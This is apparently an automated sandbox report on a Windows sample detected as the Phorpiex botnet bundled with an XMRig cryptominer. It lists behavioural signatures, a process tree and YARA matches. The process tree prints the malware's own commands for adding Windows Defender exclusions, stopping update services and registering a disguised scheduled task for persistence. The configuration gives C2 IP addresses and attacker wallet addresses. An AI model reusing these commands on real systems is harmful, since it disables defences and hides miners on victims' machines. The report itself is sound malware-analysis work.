Edit tour

Windows Analysis Report
T52Z708x2p.exe

Overview

General Information

Sample name:	T52Z708x2p.exe renamed because original name is a hash value
Original sample name:	ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7.exe
Analysis ID:	1542688
MD5:	cd3237b1e648d31b8761196b6c64da8a
SHA1:	2e677b7cafc3a8ee1696dddf38b176191d256559
SHA256:	ee4e23ea2bbf4c0b99adb8dffbac03dc7e9f4154c8dfba11b15c6711019a2ef7
Tags:	exeuser-JAMESWT_MHT
Infos:

Detection

Phorpiex, Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Suricata IDS alerts for network traffic

Yara detected Phorpiex

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Changes security center settings (notifications, updates, antivirus, firewall)

Contains functionality to check if Internet connection is working

Contains functionality to detect sleep reduction / modifications

Detected Stratum mining protocol

Drops PE files to the user root directory

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Found hidden mapped module (file has been removed from disk)

Found strings related to Crypto-Mining

Hides that the sample has been downloaded from the Internet (zone.identifier)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Connects to several IPs in different countries

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Use Short Name Path in Command Line

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

T52Z708x2p.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\T52Z708x2p.exe" MD5: CD3237B1E648D31B8761196B6C64DA8A)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

70AF.exe (PID: 7504 cmdline: "C:\Users\user~1\AppData\Local\Temp\70AF.exe" MD5: 8D8E6C7952A9DC7C0C73911C4DBC5518)

1706633239.exe (PID: 7568 cmdline: C:\Users\user~1\AppData\Local\Temp\1706633239.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)

sysppvrdnvs.exe (PID: 7612 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)

cmd.exe (PID: 7696 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7784 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 7712 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7804 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7872 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7908 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7928 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7944 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

158238779.exe (PID: 2408 cmdline: C:\Users\user~1\AppData\Local\Temp\158238779.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)

cmd.exe (PID: 6912 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7276 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1548 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6040 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

281653412.exe (PID: 1920 cmdline: C:\Users\user~1\AppData\Local\Temp\281653412.exe MD5: 0C37EE292FEC32DBA0420E6C94224E28)

1332331323.exe (PID: 1316 cmdline: C:\Users\user~1\AppData\Local\Temp\1332331323.exe MD5: 96509AB828867D81C1693B614B22F41D)

2448028260.exe (PID: 7376 cmdline: C:\Users\user~1\AppData\Local\Temp\2448028260.exe MD5: 13B26B2C7048A92D6A843C1302618FAD)

2311326414.exe (PID: 2236 cmdline: C:\Users\user~1\AppData\Local\Temp\2311326414.exe MD5: 5A0D146F7A911E98DA8CC3C6DE8ACABF)

446629599.exe (PID: 4260 cmdline: C:\Users\user~1\AppData\Local\Temp\446629599.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)

sysppvrdnvs.exe (PID: 7404 cmdline: C:\Users\user\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)

cmd.exe (PID: 6204 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5192 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7344 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7520 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7508 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7504 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

sc.exe (PID: 7824 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

193938922.exe (PID: 8148 cmdline: C:\Users\user~1\AppData\Local\Temp\193938922.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)

cmd.exe (PID: 6704 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2020 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7080 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5792 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

236013504.exe (PID: 8016 cmdline: C:\Users\user~1\AppData\Local\Temp\236013504.exe MD5: 0C37EE292FEC32DBA0420E6C94224E28)

65841553.exe (PID: 6208 cmdline: C:\Users\user~1\AppData\Local\Temp\65841553.exe MD5: 96509AB828867D81C1693B614B22F41D)

sysppvrdnvs.exe (PID: 4236 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)

svchost.exe (PID: 7312 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

powershell.exe (PID: 7872 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sysppvrdnvs.exe (PID: 7840 cmdline: "C:\Users\user\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)

winupsecvmgr.exe (PID: 6256 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)

conhost.exe (PID: 5064 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

dwm.exe (PID: 3960 cmdline: C:\Windows\System32\dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)

sysppvrdnvs.exe (PID: 5948 cmdline: "C:\Users\user\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)

powershell.exe (PID: 7648 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4708 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Phorpiex	Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.	No Attribution	https://bin.re/blog/phorpiex/ https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/ https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html https://research.checkpoint.com/2019/phorpiex-breakdown/ https://research.checkpoint.com/2020/phorpiex-arsenal-part-i/	https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\sysppvrdnvs.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Windows\sysppvrdnvs.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Temp\446629599.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Temp\1706633239.exe	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000042.00000002.2630066615.0000018B41702000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0588:$a1: mining.set_target 0x4ebd68:$a2: XMRIG_HOSTNAME 0x4ed860:$a3: Usage: xmrig [OPTIONS] 0x4ebd40:$a4: XMRIG_VERSION
Process Memory Space: 1706633239.exe PID: 7568	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysppvrdnvs.exe PID: 7612	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysppvrdnvs.exe PID: 4236	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: 446629599.exe PID: 4260	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysppvrdnvs.exe PID: 7404	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: sysppvrdnvs.exe PID: 7840	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Process Memory Space: winupsecvmgr.exe PID: 6256	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: winupsecvmgr.exe PID: 6256	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x190958:$a1: mining.set_target 0x18d51a:$a2: XMRIG_HOSTNAME 0x18e0cf:$a3: Usage: xmrig [OPTIONS] 0x18d4fb:$a4: XMRIG_VERSION
Process Memory Space: sysppvrdnvs.exe PID: 5948	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
35.2.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
48.2.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
35.0.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
19.0.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
5.2.1706633239.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
33.2.446629599.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
6.0.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
52.0.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
5.0.1706633239.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
6.2.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
52.2.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
19.2.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
48.0.sysppvrdnvs.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
33.0.446629599.exe.400000.0.unpack	JoeSecurity_Phorpiex_4	Yara detected Phorpiex	Joe Security
51.2.winupsecvmgr.exe.7ff75d000320.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
